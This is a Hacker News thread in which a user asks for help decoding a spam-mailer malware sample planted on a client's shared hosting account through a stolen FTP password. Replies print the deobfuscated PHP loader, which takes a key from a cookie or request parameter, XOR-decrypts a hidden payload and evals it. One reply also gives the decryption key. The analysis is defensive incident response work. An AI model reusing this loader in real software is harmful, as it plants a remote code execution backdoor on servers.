
Ask HN: Can you decrypt this evil thing? - noduerme
The back story is, someone got a stolen FTP password to a client's account on a shared server and uploaded this. It's some kind of darkmailer, since I spent the next three days getting that server off blacklists. It doesn't look like the attacker got access outside the account. The account's been cleaned out, but I still don't know what else this might have done. I got one level of deobfuscation in -- that's the easy part -- but it looks like it takes an input string to decrypt what's inside that. There are two parts, one in PHP and the other in perl.<p>http://pastebin.com/ctswucid<p>http://pastebin.com/vVjYrikW
======
gulbrandr
The code is obfuscated as ascii characters in the $e variable. It uses the PHP
function 'cor' to 'decrypt' the code (I think the same method is used in
evil.pl).

The PHP code is:

if (!@isset($_SERVER)) { $_COOKIE = &$HTTP_COOKIE_VARS; $_POST =
&$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; } $k = $_COOKIE['key']; if
(empty($k)) { $k = $_POST['key']; } if (empty($k)) { $k = $_GET['key']; } if
(!@function_exists('decrypt')) { eval('function
decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
} $d = @decrypt($d, $k); eval($d);

------
noodly
For PHP script, the key is:

SjJVkE6rkRYj

and decrypted evil script is here:

<http://pastebin.com/z53aByWX>

I didn't look at perl script.

~~~
noodly
And here's decrypted perl script: <http://pastebin.com/7RDpTXDp>

It does almost the same thing as PHP script, and uses the same key :P

